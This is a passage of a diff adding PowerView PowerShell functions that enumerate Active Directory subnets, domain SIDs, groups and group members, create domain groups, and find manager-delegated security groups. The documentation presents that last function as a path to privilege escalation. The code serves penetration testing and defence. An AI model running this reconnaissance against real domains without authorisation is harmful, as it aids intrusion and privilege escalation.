$($SubnetSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() } + else { $Results = $SubnetSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Subnet = $_ + } + else { + $Subnet = Convert-LDAPProperty -Properties $_.Properties + } + $Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet') + + if ($PSBoundParameters['SiteName']) { + # have to do the filtering after the LDAP query as LDAP doesn't let you specify + # wildcards for 'siteobject' :( + if ($Subnet.properties -and ($Subnet.properties.siteobject -like "*$SiteName*")) { + $Subnet + } + elseif ($Subnet.siteobject -like "*$SiteName*") { + $Subnet + } + } + else { + $Subnet + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainSubnet] Error disposing of the Results object: $_" + } + } + $SubnetSearcher.dispose() + } + } +} + + +function Get-DomainSID { +<# +.SYNOPSIS + +Returns the SID for the current domain or the specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer + +.DESCRIPTION + +Returns the SID for the current domain or the specified domain by executing +Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) +to search for domain controllers through LDAP. The SID of the returned domain controller +is then extracted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainSID + +.EXAMPLE + +Get-DomainSID -Domain testlab.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSID -Credential $Cred
+
+.OUTPUTS
+
+String
+
+A string representing the specified domain SID.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([String])]
+ [CmdletBinding()]
+ Param(
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid
+
+ if ($DCSID) {
+ $DCSID.SubString(0, $DCSID.LastIndexOf('-'))
+ }
+ else {
+ Write-Verbose "[Get-DomainSID] Error extracting domain SID for '$Domain'"
+ }
+}
+
+
+function Get-DomainGroup {
+<#
+.SYNOPSIS
+
+Return all groups or specific group objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all group objects for
+the current domain are returned. To return the groups a specific user/group is
+a part of, use -MemberIdentity X to execute token groups enumeration.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for. Wildcards accepted.
+
+.PARAMETER MemberIdentity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the user/group member to query for group membership.
+
+.PARAMETER AdminCount
+
+Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
+
+.PARAMETER GroupScope
+
+Specifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for.
+Also accepts NotDomainLocal, NotGloba, and NotUniversal as negations.
+
+.PARAMETER GroupProperty
+
+Specifies a specific property to search for when performing the group search.
+Possible values are Security, Distribution, CreatedBySystem, and NotCreatedBySystem.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER FindOne
+
+Only return one result object.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainGroup | select samaccountname
+
+samaccountname
+--------------
+WinRMRemoteWMIUsers__
+Administrators
+Users
+Guests
+Print Operators
+Backup Operators
+...
+
+.EXAMPLE
+
+Get-DomainGroup *admin* | select distinguishedname
+
+distinguishedname
+-----------------
+CN=Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Schema Admins,CN=Users,DC=testlab,DC=local
+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+CN=Domain Admins,CN=Users,DC=testlab,DC=local
+CN=DnsAdmins,CN=Users,DC=testlab,DC=local
+CN=Server Admins,CN=Users,DC=testlab,DC=local
+CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+
+.EXAMPLE
+
+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
+
+samaccountname
+--------------
+Server Admins
+
+.EXAMPLE
+
+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
+
+usncreated : 13245
+grouptype : -2147483646
+samaccounttype : 268435456
+samaccountname : Desktop Admins
+whenchanged : 8/10/2016 12:30:30 AM
+objectsid : S-1-5-21-890171859-3433809279-3366196753-1118
+objectclass : {top, group}
+cn : Desktop Admins
+usnchanged : 13255
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+name : Desktop Admins
+distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+whencreated : 8/10/2016 12:29:43 AM
+instancetype : 4
+objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71
+objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroup -Credential $Cred
+
+.EXAMPLE
+
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
+
+distinguishedname
+-----------------
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+.OUTPUTS
+
+PowerView.Group
+
+Custom PSObject with translated group property fields.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.Group')]
+ [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('UserName')]
+ [String]
+ $MemberIdentity,
+
+ [Switch]
+ $AdminCount,
+
+ [ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')]
+ [Alias('Scope')]
+ [String]
+ $GroupScope,
+
+ [ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')]
+ [String]
+ $GroupProperty,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
+ )
+
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if
($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ }
+
+ PROCESS {
+ if ($GroupSearcher) {
+ if ($PSBoundParameters['MemberIdentity']) {
+
+ if ($SearcherArguments['Properties']) {
+ $OldProperties = $SearcherArguments['Properties']
+ }
+
+ $SearcherArguments['Identity'] = $MemberIdentity
+ $SearcherArguments['Raw'] = $True
+
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ # convert the user/group to a directory entry
+ $ObjectDirectoryEntry = $_.GetDirectoryEntry()
+
+ # cause the cache to calculate the token groups for the user/group
+ $ObjectDirectoryEntry.RefreshCache('tokenGroups')
+
+ $ObjectDirectoryEntry.TokenGroups | ForEach-Object {
+ # convert the token group sid
+ $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value
+
+ # ignore the built in groups
+ if ($GroupSid -notmatch '^S-1-5-32-.*') {
+ $SearcherArguments['Identity'] = $GroupSid
+ $SearcherArguments['Raw'] = $False
+ if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
+ $Group = Get-DomainObject @SearcherArguments
+ if ($Group) {
+ $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
+ $Group
+ }
+ }
+ }
+ }
+ }
+ else {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} |
ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^CN=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainGroup] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $GroupSearcher) {
+ Write-Warning "[Get-DomainGroup] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('\')) {
+ $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentityInstance) {
+ $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+ $GroupName = $IdentityInstance.Split('\')[1]
+ $IdentityFilter += "(samAccountName=$GroupName)"
+ $SearcherArguments['Domain'] = $GroupDomain
+ Write-Verbose "[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'"
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ }
+ }
+ else {
+ $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))"
+ }
+ }
+
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+
$Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['AdminCount']) { + Write-Verbose '[Get-DomainGroup] Searching for adminCount=1' + $Filter += '(admincount=1)' + } + if ($PSBoundParameters['GroupScope']) { + $GroupScopeValue = $PSBoundParameters['GroupScope'] + $Filter = Switch ($GroupScopeValue) { + 'DomainLocal' { '(groupType:1.2.840.113556.1.4.803:=4)' } + 'NotDomainLocal' { '(!(groupType:1.2.840.113556.1.4.803:=4))' } + 'Global' { '(groupType:1.2.840.113556.1.4.803:=2)' } + 'NotGlobal' { '(!(groupType:1.2.840.113556.1.4.803:=2))' } + 'Universal' { '(groupType:1.2.840.113556.1.4.803:=8)' } + 'NotUniversal' { '(!(groupType:1.2.840.113556.1.4.803:=8))' } + } + Write-Verbose "[Get-DomainGroup] Searching for group scope '$GroupScopeValue'" + } + if ($PSBoundParameters['GroupProperty']) { + $GroupPropertyValue = $PSBoundParameters['GroupProperty'] + $Filter = Switch ($GroupPropertyValue) { + 'Security' { '(groupType:1.2.840.113556.1.4.803:=2147483648)' } + 'Distribution' { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' } + 'CreatedBySystem' { '(groupType:1.2.840.113556.1.4.803:=1)' } + 'NotCreatedBySystem' { '(!(groupType:1.2.840.113556.1.4.803:=1))' } + } + Write-Verbose "[Get-DomainGroup] Searching for group property '$GroupPropertyValue'" + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GroupSearcher.filter = "(&(objectCategory=group)$Filter)" + Write-Verbose "[Get-DomainGroup] filter string: $($GroupSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $GroupSearcher.FindOne() } + else { $Results = $GroupSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Group = $_ + } + else { + $Group = Convert-LDAPProperty -Properties $_.Properties + } + $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') + $Group + } + if ($Results) { + try { 
$Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainGroup] Error disposing of the Results object"
+ }
+ }
+ $GroupSearcher.dispose()
+ }
+ }
+ }
+}
+
+
+function New-DomainGroup {
+<#
+.SYNOPSIS
+
+Creates a new domain group (assuming appropriate permissions) and returns the group object.
+
+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+.DESCRIPTION
+
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.GroupPrincipal with the specified
+group properties.
+
+.PARAMETER SamAccountName
+
+Specifies the Security Account Manager (SAM) account name of the group to create.
+Maximum of 256 characters. Mandatory.
+
+.PARAMETER Name
+
+Specifies the name of the group to create. If not provided, defaults to SamAccountName.
+
+.PARAMETER DisplayName
+
+Specifies the display name of the group to create. If not provided, defaults to SamAccountName.
+
+.PARAMETER Description
+
+Specifies the description of the group to create.
+
+.PARAMETER Domain
+
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
+
+Creates the 'TestGroup' group with the specified description.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
-Credential $Cred
+
+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
+
+.OUTPUTS
+
+DirectoryServices.AccountManagement.GroupPrincipal
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('DirectoryServices.AccountManagement.GroupPrincipal')]
+ Param(
+ [Parameter(Mandatory = $True)]
+ [ValidateLength(0, 256)]
+ [String]
+ $SamAccountName,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Name,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $DisplayName,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Description,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ $ContextArguments = @{
+ 'Identity' = $SamAccountName
+ }
+ if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+ $Context = Get-PrincipalContext @ContextArguments
+
+ if ($Context) {
+ $Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context)
+
+ # set all the appropriate group parameters
+ $Group.SamAccountName = $Context.Identity
+
+ if ($PSBoundParameters['Name']) {
+ $Group.Name = $Name
+ }
+ else {
+ $Group.Name = $Context.Identity
+ }
+ if ($PSBoundParameters['DisplayName']) {
+ $Group.DisplayName = $DisplayName
+ }
+ else {
+ $Group.DisplayName = $Context.Identity
+ }
+
+ if ($PSBoundParameters['Description']) {
+ $Group.Description = $Description
+ }
+
+ Write-Verbose "[New-DomainGroup] Attempting to create group '$SamAccountName'"
+ try {
+ $Null = $Group.Save()
+ Write-Verbose "[New-DomainGroup] Group '$SamAccountName' successfully created"
+ $Group
+ }
+ catch {
+
Write-Warning "[New-DomainGroup] Error creating group '$SamAccountName' : $_" + } + } +} + + +function Get-DomainManagedSecurityGroup { +<# +.SYNOPSIS + +Returns all security groups in the current (or target) domain that have a manager set. + +Author: Stuart Morgan (@ukstufus) , Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl + +.DESCRIPTION + +Authority to manipulate the group membership of AD security groups and distribution groups +can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically +used to delegate management authority to distribution groups, but Windows supports security groups +being managed in the same way. + +This function searches for AD groups which have a group manager set, and determines whether that +user can manipulate group membership. This could be a useful method of horizontal privilege +escalation, especially if the manager can manipulate the membership of a privileged group. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. 
+
+.EXAMPLE
+
+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+
+Store a list of all security groups with managers in group-managers.csv
+
+.OUTPUTS
+
+PowerView.ManagedSecurityGroup
+
+A custom PSObject describing the managed security group.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ManagedSecurityGroup')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))'
+ 'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname'
+ }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) {
$SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $SearcherArguments['Domain'] = $Domain
+ $TargetDomain = $Domain
+ }
+ else {
+ $TargetDomain = $Env:USERDNSDOMAIN
+ }
+
+ # go through the list of security groups on the domain and identify those who have a manager
+ Get-DomainGroup @SearcherArguments | ForEach-Object {
+ $SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid'
+ $SearcherArguments['Identity'] = $_.managedBy
+ $Null = $SearcherArguments.Remove('LDAPFilter')
+
+ # $SearcherArguments
+ # retrieve the object that the managedBy DN refers to
+ $GroupManager = Get-DomainObject @SearcherArguments
+ # Write-Host "GroupManager: $GroupManager"
+ $ManagedGroup = New-Object PSObject
+ $ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname
+ $ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname
+ $ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname
+ $ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName
+
+ # determine whether the manager is a user or a group
+ if ($GroupManager.samaccounttype -eq 0x10000000) {
+ $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group'
+ }
+ elseif ($GroupManager.samaccounttype -eq 0x30000000) {
+ $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User'
+ }
+
+ $ACLArguments = @{
+ 'Identity' = $_.distinguishedname
+ 'RightsFilter' = 'WriteMembers'
+ }
+ if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if
($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
+
+ # # TODO: correct!
+ # # find the ACLs that relate to the ability to write to the group
+ # $xacl = Get-DomainObjectAcl @ACLArguments -Verbose
+ # # $ACLArguments
+ # # double-check that the manager
+ # if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) {
+ # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True
+ # }
+ # else {
+ # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False
+ # }
+
+ $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN'
+
+ $ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup')
+ $ManagedGroup
+ }
+ }
+}
+
+
+function Get-DomainGroupMember {
+<#
+.SYNOPSIS
+
+Return the members of a specific domain group.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for the specified
+group matching the criteria. Each result is then rebound and the full user
+or group object is returned.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for. Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER Recurse
+
+Switch. If the group member is a group, recursively try to query its members as well.
+
+.PARAMETER RecurseUsingMatchingRule
+
+Switch.
Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
+Much faster than manual recursion, but doesn't reveal cross-domain groups,
+and only returns user accounts (no nested group objects themselves).
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
